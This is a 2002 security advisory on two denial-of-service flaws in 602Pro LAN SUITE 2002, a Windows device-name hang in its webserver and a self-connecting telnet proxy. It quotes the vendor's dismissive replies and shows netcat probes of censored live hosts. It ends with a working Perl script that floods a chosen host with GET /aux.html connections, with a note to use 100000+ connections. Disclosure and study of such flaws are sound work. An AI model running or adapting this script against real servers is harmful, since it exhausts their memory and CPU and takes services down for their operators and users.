Date: August 3, 2002 (Updated August 20, 2002) Author: Stan Bubrouski Product: 602Pro LAN SUITE 2002 Version: 2002 Vendor: Software602, Inc. Summary: Denial of Service attacks in webserver and telnet proxy Updates: Description: There are two denial of service attacks in 602Pro LAN SUITE 2002 for windows. The problems are described below. I've once again attached an exploit for the webserver DoS out of sheer frustration. Problem 1: Webserver/Webmail windows device name DoS attack This problem is NOT FIXED. The person from Software602 who responded to my advisory completely lacks an understanding of how windows devices work, and as a result this problem still affects about %50+ of all their users (using netcraft as a source.) Response from developer: "1. AUX is filtered for a long time. AUX.HTML is not a problem because of the extension (no aux.html device exists)." As you can see the developer does not understand that on most windows platform aux.whatever or con.whatever is the same as AUX or CON respectively. To prove this I used a harmless method of testing this problem using sites listed on Netcraft as using Web602. Here is an example of a non- vulnerable host: $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].com 80 HTTP/1.1 404 The file requested was not found Server: WEB602/1.04 Content-Type: text/html Content-Length: 111 Notice the Content-Length is 111, this is the length of the built-in 404 error message. BTW using HEAD does not exibit the problem, only using GET requests does. Ok now let's look at a vulnerable host: $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].net 80 HTTP/1.1 200 OK Server: WEB602/1.04 Content-type: text/html Content-length: 0 Connection: close Notice the Content-Length is 0, if I were to send a GET request to that host requesting aux.html it would say Content-Length: 0 but the connection NEVER closes, it doesn't even time-out. Doing this repetitively quickly and efficiently eats up memory and CPU which will not be released till the process is killed. This problem only seems to affect certain versions of Windows. Despite what the developers claim it is a problem and was able to find a couple hundred vulenrable hosts using the HEAD method I showed above. It seems to me from the limited information I have from having people personally test this Win2k SP2/3 (EN) seem vulnerable and Windows XP apparently does not. As for other Windows OSs I can only speculate. Either its the OS or a patch I do not have access to, either way there is something wrong. Problem 2: The telnet proxy is vulnerable to a DoS attack The telnet proxy allows connections to localhost essentially allowing you to connect to the proxy through the proxy, without limit. Response from developer: "2. When You set up the IP filter (this is the only one correct way of using any proxy server!!!! no free service for anybody!!), then nobody else can not connect out trough Your telnet proxy... Telnet proxy will be limited by Your notice. In "socksdll.ini" will be line "TelnetMax=xxx" (where "xxx" will be number of max connections)." So in a new release this will/is fixed.
#!/usr/bin/perl # # lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS # # Note: Try using a connections setting of 100000+ for obvious results # # Date: August 3, 2002 # Author: Stan Bubrouski (stan@ccs.neu.edu) use IO::Socket; if (!$ARGV[2]) { print "Usage $0 <hostname> <port> <connections>\n\n"; exit(); } $host = $ARGV[0]; $port = $ARGV[1]; $numc = $ARGV[2]; foreach(1...$numc) { $sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port"); print $sock "GET /aux.html HTTP/1.0\r\n"; }